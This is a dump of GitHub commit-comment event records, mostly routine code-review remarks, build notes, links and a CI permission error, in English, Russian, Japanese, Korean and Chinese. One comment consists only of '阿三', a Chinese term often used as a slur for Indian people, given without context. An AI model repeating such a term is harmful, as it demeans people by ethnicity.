{"id":"7903055401","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29558024,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-01T13:42:19Z","updated_at":"2018-07-01T13:42:19Z","author_association":"NONE","body":"built with config flag --without-ffmpeg and seems to have compiled fine. will install and test."}},"created_at":"2018-07-01T13:42:19Z"}
{"id":"7903055855","type":"CommitCommentEvent","actor":{"login":"sandy240"},"repo":{"name":"carufus/bbq-samiksha-app"},"payload":{"comment":{"id":29558025,"position":57,"line":166,"path":"app/src/main/java/com/app/bbq/samiksha/QuestionnaireActivity.java","commit_id":"251e5c8bcfaac9dba171b45d98b21f70c457f631","created_at":"2018-07-01T13:42:40Z","updated_at":"2018-07-01T13:42:40Z","author_association":"CONTRIBUTOR","body":"There is lot changes done around renderQuestion, I see isHasChild was added just to show/hide while rendering, instead if we had got the child id itself, we could have avoided the changes"}},"created_at":"2018-07-01T13:42:40Z"}
{"id":"7903056420","type":"CommitCommentEvent","actor":{"login":"fmichonneau"},"repo":{"name":"datacarpentry/r-raster-vector-geospatial"},"payload":{"comment":{"id":29558029,"position":null,"line":null,"path":null,"commit_id":"2a3bf5e4382a6c9dc57df66e78dc0e79ddce8ff8","created_at":"2018-07-01T13:43:05Z","updated_at":"2018-07-01T13:43:05Z","author_association":"MEMBER","body":"Could you please submit this as a PR on the styles repository? thanks!"}},"created_at":"2018-07-01T13:43:05Z"}
{"id":"7903056954","type":"CommitCommentEvent","actor":{"login":"Jupadr"},"repo":{"name":"Jupadr/eosblocktalk"},"payload":{"comment":{"id":29558030,"position":null,"line":null,"path":null,"commit_id":"a089bb5a36bad13618a42efbe2e64db2b72fa871","created_at":"2018-07-01T13:43:26Z","updated_at":"2018-07-01T13:43:26Z","author_association":"OWNER","body":"The structure is very influenced by code from leordev/monstereos which I used as a reference how to structure C++ code. So I thank @leordev and all the other contributors of monstereos for making such a fun game"}},"created_at":"2018-07-01T13:43:26Z"}
{"id":"7903056966","type":"CommitCommentEvent","actor":{"login":"FellippeHeitor"},"repo":{"name":"davidshq/civilwarstrategygame"},"payload":{"comment":{"id":29558031,"position":null,"line":null,"path":null,"commit_id":"bb68d112d9ff29cf14e7766861b393f0199d78a3","created_at":"2018-07-01T13:43:27Z","updated_at":"2018-07-01T13:43:27Z","author_association":"NONE","body":"It went public! Good to hear!"}},"created_at":"2018-07-01T13:43:27Z"}
{"id":"7903056981","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"IlyaDvortsevoy/NET.S.2018.Dvortsevoy.03"},"payload":{"comment":{"id":29558032,"position":null,"line":null,"path":null,"commit_id":"f9f2d744a98dedcfde0d7a2554fedcb023202ce5","created_at":"2018-07-01T13:43:27Z","updated_at":"2018-07-01T13:43:27Z","author_association":"NONE","body":"- Не хватает тестов\r\n- Напоминаю о том, что комитим только файлы с кодом!"}},"created_at":"2018-07-01T13:43:27Z"}
{"id":"7903058124","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29558033,"position":null,"line":null,"path":null,"commit_id":"ab91df8a3807daa211cf43ece55a08ef1e034e5b","created_at":"2018-07-01T13:44:20Z","updated_at":"2018-07-01T13:44:20Z","author_association":"OWNER","body":"Ouch, I did some crass errors in the manual... :rofl: "}},"created_at":"2018-07-01T13:44:20Z"}
{"id":"7903058170","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29558034,"position":null,"line":null,"path":null,"commit_id":"e570a72c3d146ec864e5962025c9e29de6fda461","created_at":"2018-07-01T13:44:22Z","updated_at":"2018-07-01T13:44:22Z","author_association":"NONE","body":"Hi there, can I backport these changes be made to both the non-OIT renderer and the OIT renderer? Or does OIT require several differences to be made?\r\n\r\nWith which games could I see a difference as a result of implementing this -just for testing purposes?"}},"created_at":"2018-07-01T13:44:22Z"}
{"id":"7903059316","type":"CommitCommentEvent","actor":{"login":"PhephisileN"},"repo":{"name":"PhephisileN/MyQuizApplication"},"payload":{"comment":{"id":29558036,"position":null,"line":null,"path":null,"commit_id":"2cebd8b6218f4368413795be1c523363af927fae","created_at":"2018-07-01T13:45:15Z","updated_at":"2018-07-01T13:45:15Z","author_association":"OWNER","body":"Link to APK on my G Drive: https://drive.google.com/drive/folders/14EgQ5BcFB5nh4ZNdeoa7NB0Zaly9mJuF?usp=sharing"}},"created_at":"2018-07-01T13:45:15Z"}
{"id":"7903059572","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29558039,"position":null,"line":null,"path":null,"commit_id":"9f08f6628bf324696c9058eae0cbb4e938031470","created_at":"2018-07-01T13:45:27Z","updated_at":"2018-07-01T13:45:27Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42135028-19903f88-7d63-11e8-8e1c-210182c30160.png)\r\n"}},"created_at":"2018-07-01T13:45:27Z"}
{"id":"7903061036","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29558045,"position":null,"line":null,"path":null,"commit_id":"9f08f6628bf324696c9058eae0cbb4e938031470","created_at":"2018-07-01T13:46:30Z","updated_at":"2018-07-01T13:46:30Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42135032-2b1385f8-7d63-11e8-8de2-b6f3eee940be.png)\r\n![image](https://user-images.githubusercontent.com/3115439/42135036-34650780-7d63-11e8-8f16-6e31fdb22544.png)\r\n"}},"created_at":"2018-07-01T13:46:30Z"}
{"id":"7903061259","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29558046,"position":null,"line":null,"path":null,"commit_id":"9f08f6628bf324696c9058eae0cbb4e938031470","created_at":"2018-07-01T13:46:39Z","updated_at":"2018-07-01T13:46:39Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42135041-460e9ffa-7d63-11e8-81a5-75d94b5b1674.png)\r\n"}},"created_at":"2018-07-01T13:46:39Z"}
{"id":"7903062123","type":"CommitCommentEvent","actor":{"login":"Mitzz"},"repo":{"name":"Mitzz/Refractoring"},"payload":{"comment":{"id":29558049,"position":null,"line":null,"path":null,"commit_id":"9f08f6628bf324696c9058eae0cbb4e938031470","created_at":"2018-07-01T13:47:16Z","updated_at":"2018-07-01T13:47:16Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/3115439/42135046-5bfa18b2-7d63-11e8-8a28-57f2e41dcf25.png)\r\n"}},"created_at":"2018-07-01T13:47:16Z"}
{"id":"7903063168","type":"CommitCommentEvent","actor":{"login":"jinnaiyuu"},"repo":{"name":"spinute/ods"},"payload":{"comment":{"id":29558052,"position":null,"line":null,"path":null,"commit_id":"ddf475f6e99fe15d3506e3fc5a69dd4bfec4030c","created_at":"2018-07-01T13:47:58Z","updated_at":"2018-07-01T13:47:58Z","author_association":"COLLABORATOR","body":"そこは結構悩んでいるんですが、Sectionタイトルは曖昧な表現でも簡潔な表現の方が良いのかなあと思っています。\r\n\r\n「データ構造がX時間」というのは未定義の表現だけれどまあ大意は伝わる人には伝わるので（伝わらない人は多分まだYFastTrieを読むべきではない）。\r\n関連して、「SkillistSSet: 効率的なSSet」とかも何が効率的なのか、みたいな疑問ができます（こちらのタイトルも良いのがあればいいんですが。。。）。\r\n\r\n\r\nアルゴリズムデザイン・Intro to Algoとかのガチ本はこういう副題は何もつけていないです。"}},"created_at":"2018-07-01T13:47:58Z"}
{"id":"7903064795","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29558054,"position":null,"line":null,"path":null,"commit_id":"962e8e8dab88e4359117b1cd47dc9a6bc4166d9a","created_at":"2018-07-01T13:49:04Z","updated_at":"2018-07-01T13:49:04Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n{\n  \"AnyOf\": \\[\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n      \\]\n    },\n    {\n      \"AnyOf\": \\[\n        \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n        {\n          \"AllOf\": \\[\n            \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            \"queue:task\\-group\\-id:taskcluster\\-github/LW41idYLSXqwJfqBsKReuQ\",\n            \"queue:schedule\\-task:taskcluster\\-github/LW41idYLSXqwJfqBsKReuQ/LW41idYLSXqwJfqBsKReuQ\"\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n\nYou have the scopes:\n\n```\n\\[\n  \"assume:project:taskcluster:mozilla\\-github\\-repository\",\n  \"assume:repo:github.com/servo/servo:pull\\-request\",\n  \"notify:email:\\*\",\n  \"notify:irc\\-channel:\\*\",\n  \"notify:irc\\-user:\\*\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/github\\-worker\\-windows\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/servo\",\n  \"queue:create\\-task:aws\\-provisioner\\-v1/win2012r2\",\n  \"queue:route:garbage.\\*\",\n  \"queue:route:index.garbage.\\*\",\n  \"queue:route:notify.email.\\*\",\n  \"queue:route:notify.irc\\-channel.\\*\",\n  \"queue:route:notify.irc\\-user.\\*\",\n  \"queue:scheduler\\-id:taskcluster\\-github\",\n  \"secrets:get:garbage/\\*\",\n  \"secrets:set:garbage/\\*\"\n\\]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": \\[\n    {\n      \"AnyOf\": \\[\n        {\n          \"AllOf\": \\[\n            \"queue:scheduler\\-id:taskcluster\\-github\",\n            {\n              \"AnyOf\": \\[\n                \"queue:create\\-task:highest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:high:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:medium:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:very\\-low:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:create\\-task:lowest:aws\\-provisioner\\-v1/servo\\-docker\\-worker\"\n              \\]\n            }\n          \\]\n        },\n        {\n          \"AnyOf\": \\[\n            \"queue:create\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n            {\n              \"AllOf\": \\[\n                \"queue:define\\-task:aws\\-provisioner\\-v1/servo\\-docker\\-worker\",\n                \"queue:task\\-group\\-id:taskcluster\\-github/LW41idYLSXqwJfqBsKReuQ\",\n                \"queue:schedule\\-task:taskcluster\\-github/LW41idYLSXqwJfqBsKReuQ/LW41idYLSXqwJfqBsKReuQ\"\n              \\]\n            }\n          \\]\n        }\n      \\]\n    }\n  \\]\n}\n```\n----\nmethod:     createTask\nerrorCode:  InsufficientScopes\nstatusCode: 403\ntime:       2018-07-01T13:49:04.105Z\n\n</details>"}},"created_at":"2018-07-01T13:49:04Z"}
{"id":"7903065297","type":"CommitCommentEvent","actor":{"login":"opk4406opk"},"repo":{"name":"opk4406opk/HELLO_MY_WORLD"},"payload":{"comment":{"id":29558058,"position":null,"line":null,"path":null,"commit_id":"8431cb9e74654d10dcfcb9413e2bd3d06a40f1bf","created_at":"2018-07-01T13:49:26Z","updated_at":"2018-07-01T13:49:26Z","author_association":"OWNER","body":"sqlite3 라이브러리를 안드로이드에서 적용하는데 있어, 필요했던 libsqlite3.so 파일이 문제가 있었다.\r\n기존에 있던 건 삭제하고 새로 구해서 적용시켰더니 제대로 동작한다.\r\n"}},"created_at":"2018-07-01T13:49:26Z"}
{"id":"7903066071","type":"CommitCommentEvent","actor":{"login":"charbelsako"},"repo":{"name":"charbelsako/pacman"},"payload":{"comment":{"id":29558059,"position":null,"line":null,"path":null,"commit_id":"0ad1c0036df89aacf68265c424cdf40bd0cbdee0","created_at":"2018-07-01T13:49:59Z","updated_at":"2018-07-01T13:49:59Z","author_association":"OWNER","body":"Fixes Issue #19 "}},"created_at":"2018-07-01T13:49:59Z"}
{"id":"7903067351","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Kirill-Dimidyuk/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558060,"position":42,"line":42,"path":"NET.S.2018.Dimidyuk.03/#1/FindNthRoot.cs","commit_id":"325f2bc61a56b1743c536a8a5ba09c9279f6ba9f","created_at":"2018-07-01T13:50:52Z","updated_at":"2018-07-01T13:50:52Z","author_association":"NONE","body":"- Валидация данных не удовлетворяет спецификации, которая, фактически заложена в тесткейсах (нужно, чтобы прошли все мои тесткейсы)"}},"created_at":"2018-07-01T13:50:52Z"}
{"id":"7903067834","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"bio2bel/drugbank"},"payload":{"comment":{"id":29558062,"position":53,"line":578,"path":"src/bio2bel_drugbank/manager.py","commit_id":"78cef4e536e7b90ab19c401951d58b9cb723bab2","created_at":"2018-07-01T13:51:10Z","updated_at":"2018-07-01T13:51:10Z","author_association":"MEMBER","body":"why not return `protein.drug_interactions` directly?\r\n\r\nDepending on the SQLAlchemy definitions, you might have to write `protein.drug_interactions.all()`"}},"created_at":"2018-07-01T13:51:10Z"}
{"id":"7903068872","type":"CommitCommentEvent","actor":{"login":"alexw994"},"repo":{"name":"alexw994/newscnn"},"payload":{"comment":{"id":29558064,"position":null,"line":null,"path":null,"commit_id":"ab7c42a419d55b7ab1bc98252b3d4cf3b56aa6d1","created_at":"2018-07-01T13:51:54Z","updated_at":"2018-07-01T13:51:54Z","author_association":"OWNER","body":"阿三"}},"created_at":"2018-07-01T13:51:54Z"}
{"id":"7903068879","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"bio2bel/drugbank"},"payload":{"comment":{"id":29558065,"position":31,"line":177,"path":"src/bio2bel_drugbank/manager.py","commit_id":"78cef4e536e7b90ab19c401951d58b9cb723bab2","created_at":"2018-07-01T13:51:54Z","updated_at":"2018-07-01T13:51:54Z","author_association":"MEMBER","body":"Use Python3 type annotations\r\n\r\n`def get_protein_by_hgnc_id(self, hgnc_id: str) -> Optional[Protein]`"}},"created_at":"2018-07-01T13:51:54Z"}
{"id":"7903069990","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"bio2bel/drugbank"},"payload":{"comment":{"id":29558066,"position":42,"line":567,"path":"src/bio2bel_drugbank/manager.py","commit_id":"78cef4e536e7b90ab19c401951d58b9cb723bab2","created_at":"2018-07-01T13:52:43Z","updated_at":"2018-07-01T13:52:43Z","author_association":"MEMBER","body":"Use Python3 type annotations\r\n\r\n```python\r\ndef get_interactions_by_hgnc_id(self, hgnc_id: str) -> Optional[List[DrugProteinInteraction]]:\r\n    ...\r\n```"}},"created_at":"2018-07-01T13:52:43Z"}
{"id":"7903070233","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Kirill-Dimidyuk/Training-Summer-Express-2018"},"payload":{"comment":{"id":29558067,"position":16,"line":16,"path":"NET.S.2018.Dimidyuk.03/#1/FindNthRoot.cs","commit_id":"325f2bc61a56b1743c536a8a5ba09c9279f6ba9f","created_at":"2018-07-01T13:52:52Z","updated_at":"2018-07-01T13:52:52Z","author_association":"NONE","body":"- Парамер степени должен быть целочисленным\r\n- x0 x1 - плохие названия для переменных ->  (выбирайте из xPrevios, xNext, xCurrent... )"}},"created_at":"2018-07-01T13:52:52Z"}
{"id":"7903070899","type":"CommitCommentEvent","actor":{"login":"spinute"},"repo":{"name":"spinute/ods"},"payload":{"comment":{"id":29558069,"position":null,"line":null,"path":null,"commit_id":"ddf475f6e99fe15d3506e3fc5a69dd4bfec4030c","created_at":"2018-07-01T13:53:22Z","updated_at":"2018-07-01T13:53:22Z","author_association":"OWNER","body":"簡潔さも重要というのも、まあだいたい伝わるというのも賛成です。\r\n\r\n僕も悩んだ結果どっちが良いかよくわからないので、決めちゃってください！（あるいは鹿野さんに聞いてみる？）"}},"created_at":"2018-07-01T13:53:22Z"}
{"id":"7903073289","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"libretro/fbalpha"},"payload":{"comment":{"id":29558072,"position":null,"line":null,"path":null,"commit_id":"9d1b3af1f9b2933c08d2a36f97c32f5ed88de2a3","created_at":"2018-07-01T13:54:59Z","updated_at":"2018-07-01T13:54:59Z","author_association":"NONE","body":"Just to note - looks like you used tab indentation for this commit vs the existing space indentation of the file. "}},"created_at":"2018-07-01T13:54:59Z"}
{"id":"7903073447","type":"CommitCommentEvent","actor":{"login":"Sugisakii"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29558074,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T13:55:05Z","updated_at":"2018-07-01T13:55:05Z","author_association":"NONE","body":"Insert this https://github.com/Sugisakii/SteamDB-SalientCheat-AutoUpdate on readme"}},"created_at":"2018-07-01T13:55:05Z"}
{"id":"7903074637","type":"CommitCommentEvent","actor":{"login":"ojaha065"},"repo":{"name":"KickVN/SaliensAuto"},"payload":{"comment":{"id":29558077,"position":null,"line":null,"path":null,"commit_id":"a6676b6a608334af66b291d0ea7e437642b089da","created_at":"2018-07-01T13:55:54Z","updated_at":"2018-07-01T13:55:54Z","author_association":"NONE","body":"An insider...? :D\r\n\r\nPersonally I'm not so sure about that theory but only time will tell. But in the end it doesn't really matter because all of us will reach level 21 without a problem if the bosses keep spawning at this rate."}},"created_at":"2018-07-01T13:55:54Z"}
{"id":"7903075221","type":"CommitCommentEvent","actor":{"login":"Plrip"},"repo":{"name":"Plrip/SalienUpdater"},"payload":{"comment":{"id":29558078,"position":null,"line":null,"path":null,"commit_id":"37ff75b8f2e8b63d2b1f56905427538d6bde126c","created_at":"2018-07-01T13:56:18Z","updated_at":"2018-07-01T13:56:18Z","author_association":"OWNER","body":"Make a update.cmd with this code in the cheat directory Start this file for update"}},"created_at":"2018-07-01T13:56:18Z"}
{"id":"7903076232","type":"CommitCommentEvent","actor":{"login":"it0uchpods"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558080,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T13:57:02Z","updated_at":"2018-07-01T13:57:02Z","author_association":"CONTRIBUTOR","body":"Both, this is what the real attitude indicator looks like for example: https://farm7.staticflickr.com/6195/6066184333_b3b1cc4a55_b.jpg\r\n\r\nLook closely at the attitude indicator, but the basic principle applies to some other instruments."}},"created_at":"2018-07-01T13:57:02Z"}
{"id":"7903076319","type":"CommitCommentEvent","actor":{"login":"cassidydotdk"},"repo":{"name":"SitecoreUnicorn/Unicorn"},"payload":{"comment":{"id":29558081,"position":null,"line":null,"path":null,"commit_id":"b8ab9ff491380a587abc29b89d67df34b67f8c05","created_at":"2018-07-01T13:57:06Z","updated_at":"2018-07-01T13:57:06Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/8483909/42135171-64d79656-7d47-11e8-8fce-f46413d625a3.png)\r\n"}},"created_at":"2018-07-01T13:57:06Z"}
{"id":"7903077196","type":"CommitCommentEvent","actor":{"login":"skitzofrenicdev"},"repo":{"name":"Azure/azure-docs-cli-python"},"payload":{"comment":{"id":29558084,"position":4,"line":4,"path":"README.md","commit_id":"835ac7740a217b5decc83540712916aba4bc915c","created_at":"2018-07-01T13:57:42Z","updated_at":"2018-07-01T13:57:42Z","author_association":"NONE","body":"Pull"}},"created_at":"2018-07-01T13:57:42Z"}
{"id":"7903077335","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AntonDr/NET.S.2018.Drachylouski.03"},"payload":{"comment":{"id":29558085,"position":56,"line":56,"path":"NET.S.2018.Drachylouski.03/NthRootLogic/FindNthRootClass.cs","commit_id":"39edbf6800fc0bf5cf32d71f3110db70c41f990b","created_at":"2018-07-01T13:57:48Z","updated_at":"2018-07-01T13:57:48Z","author_association":"NONE","body":"accuracy < 0 && accuracy > 1"}},"created_at":"2018-07-01T13:57:48Z"}
{"id":"7903077438","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"AntonDr/NET.S.2018.Drachylouski.03"},"payload":{"comment":{"id":29558086,"position":20,"line":20,"path":"NET.S.2018.Drachylouski.03/NthRootLogic/FindNthRootClass.cs","commit_id":"39edbf6800fc0bf5cf32d71f3110db70c41f990b","created_at":"2018-07-01T13:57:52Z","updated_at":"2018-07-01T13:57:52Z","author_association":"NONE","body":"-     XML комментарии для исключений"}},"created_at":"2018-07-01T13:57:52Z"}
{"id":"7903080232","type":"CommitCommentEvent","actor":{"login":"mathiasm74"},"repo":{"name":"githubsaturn/captainduckduck"},"payload":{"comment":{"id":29558087,"position":19,"line":175,"path":"website/pages/en/index.js","commit_id":"3bba9e98878da5ff9685ee2c16aace1bd234a1b0","created_at":"2018-07-01T13:59:47Z","updated_at":"2018-07-01T13:59:47Z","author_association":"CONTRIBUTOR","body":"The idiom is \"at a glance\",  not \"in a glance\"."}},"created_at":"2018-07-01T13:59:47Z"}
{"id":"7903080337","type":"CommitCommentEvent","actor":{"login":"pkboom"},"repo":{"name":"pkboom/vue-tips"},"payload":{"comment":{"id":29558088,"position":null,"line":null,"path":null,"commit_id":"cde33bb4067595c6f2b1d425cb35f7554423fbbe","created_at":"2018-07-01T13:59:51Z","updated_at":"2018-07-01T13:59:51Z","author_association":"OWNER","body":"https://winnercrespo.com/things-that-wont-work-using-vue/?utm_campaign=Revue%20newsletter&utm_medium=Newsletter&utm_source=Vue.js%20News"}},"created_at":"2018-07-01T13:59:51Z"}
{"id":"7903083084","type":"CommitCommentEvent","actor":{"login":"saganshul"},"repo":{"name":"sharmamohit123/owtf"},"payload":{"comment":{"id":29558095,"position":10,"line":10,"path":"owtf/webapp/src/containers/Transactions/Header.js","commit_id":"087f45aa5384387821f308890650fd12f8dfe624","created_at":"2018-07-01T14:01:24Z","updated_at":"2018-07-01T14:01:24Z","author_association":"NONE","body":"@sharmamohit123 remove Empty line"}},"created_at":"2018-07-01T14:01:24Z"}
{"id":"7903083965","type":"CommitCommentEvent","actor":{"login":"mirraaj"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29558097,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T14:01:59Z","updated_at":"2018-07-01T14:01:59Z","author_association":"CONTRIBUTOR","body":"Thank you @Kaixhin. :)"}},"created_at":"2018-07-01T14:01:59Z"}
{"id":"7903084348","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.03"},"payload":{"comment":{"id":29558099,"position":32,"line":32,"path":"Logic.Task2/AdditionalMathPack.cs","commit_id":"fa8a44b0bbbfe21bd8549685093e3fe7fa6f17f9","created_at":"2018-07-01T14:02:16Z","updated_at":"2018-07-01T14:02:16Z","author_association":"NONE","body":"eps < 0 && eps > 1"}},"created_at":"2018-07-01T14:02:16Z"}
{"id":"7903084639","type":"CommitCommentEvent","actor":{"login":"saganshul"},"repo":{"name":"sharmamohit123/owtf"},"payload":{"comment":{"id":29558100,"position":30,"line":30,"path":"owtf/webapp/src/containers/Transactions/TransactionHeader.js","commit_id":"087f45aa5384387821f308890650fd12f8dfe624","created_at":"2018-07-01T14:02:28Z","updated_at":"2018-07-01T14:02:28Z","author_association":"NONE","body":"@sharmamohit123 Why commented code? Also you can use /* */ in JS."}},"created_at":"2018-07-01T14:02:28Z"}
{"id":"7903087019","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29558102,"position":null,"line":null,"path":null,"commit_id":"0a7a28a5a66cc5712f296a3b404ce9f1a4510216","created_at":"2018-07-01T14:04:04Z","updated_at":"2018-07-01T14:04:04Z","author_association":"MEMBER","body":"Sorry for the misleading branch name. I was going to rename this to `queryColShapePosition` as per https://bugs.mtasa.com/view.php?id=9373, but decided to keep it consistent with `isInsideRadarArea`"}},"created_at":"2018-07-01T14:04:04Z"}
{"id":"7903087264","type":"CommitCommentEvent","actor":{"login":"Letanyan"},"repo":{"name":"BinaryNinjaz/COS301-Capstone"},"payload":{"comment":{"id":29558103,"position":null,"line":null,"path":null,"commit_id":"df8aea9edbaa3ea952f57739d6e42ba6503a033e","created_at":"2018-07-01T14:04:14Z","updated_at":"2018-07-01T14:04:14Z","author_association":"COLLABORATOR","body":"```\r\nprivate String urlExpectYieldText() {\r\n    String base = \"https://us-central1-harvest-ios-1522082524457.cloudfunctions.net/expectedYield\";\r\n    base = base + \"orchardId=\" + /* The id for whatever orchard they're in */;\r\n    base = base + \"&date=\" + /* current date in utc (same as what you save it as in the database)*/;\r\n    base = base + \"&uid=\" + farmerKey; /* the farmers key from MainActivity */\r\n    return base;\r\n}\r\n\r\n\r\npublic void getExpectedYield() {\r\n  try {\r\n    Thread thread = new Thread(new Runnable() {\r\n      @Override\r\n      public void run() {\r\n        try {\r\n          String response = sendGet(urlExpectYieldText());\r\n          JSONObject obj = JSONObject(response);\r\n          final Double expectedYield = obj.getDouble(\"expected\"); // This is the value\r\n          runOnUiThread(new Runnable() {\r\n            public void run() {\r\n              // set the label in the activity with 'expectedYield' here\r\n            }\r\n          })\r\n        } catch (Exception e) {\r\n          e.printStackTrace();\r\n        }\r\n      }\r\n    });\r\n  } catch (Exception e) {\r\n    e.printStackTrace();\r\n  }\r\n}\r\n```\r\n\r\nI haven't run this code so it might have errors (other than the comments you need to fill in). But this is essentially all you need to do. just replace `getNewPage` with `getExpectedYield`. And replace `urlSessionText` function with `urlExpectedYieldText`"}},"created_at":"2018-07-01T14:04:14Z"}
{"id":"7903088486","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.03"},"payload":{"comment":{"id":29558104,"position":117,"line":117,"path":"Logic.Task2/AdditionalMathPack.cs","commit_id":"fa8a44b0bbbfe21bd8549685093e3fe7fa6f17f9","created_at":"2018-07-01T14:05:08Z","updated_at":"2018-07-01T14:05:08Z","author_association":"NONE","body":"- В результате реализации численного метода с заданной точностью найденным решением считается то, при котором выполняется условие, которое у Вам описано условием Math.Abs(result - comparingValue) > eps. Округление не имеет смысла и не нужно. \r\n-Старайтесь не усложнять свои решения, здесь нужен только один метод FindNthRoot"}},"created_at":"2018-07-01T14:05:08Z"}
{"id":"7903089475","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29558106,"position":null,"line":null,"path":null,"commit_id":"31edcdb96fec53414942ad2faabe56c1538419c8","created_at":"2018-07-01T14:05:43Z","updated_at":"2018-07-01T14:05:43Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-140543 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-140543\") to [dev](https://console.bluemix.net/apps/22746cc3-036e-4150-852c-478d9278c24d?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T14:05:43Z"}
{"id":"7903089782","type":"CommitCommentEvent","actor":{"login":"infus38"},"repo":{"name":"parthsl/tools"},"payload":{"comment":{"id":29558107,"position":null,"line":null,"path":null,"commit_id":"704d9c3565e439d107151d204d72fbab7f71eb03","created_at":"2018-07-01T14:05:57Z","updated_at":"2018-07-01T14:05:57Z","author_association":"NONE","body":"hi, is it possible to get information regarding which one applied for cortex A7 pleas sir ? "}},"created_at":"2018-07-01T14:05:57Z"}
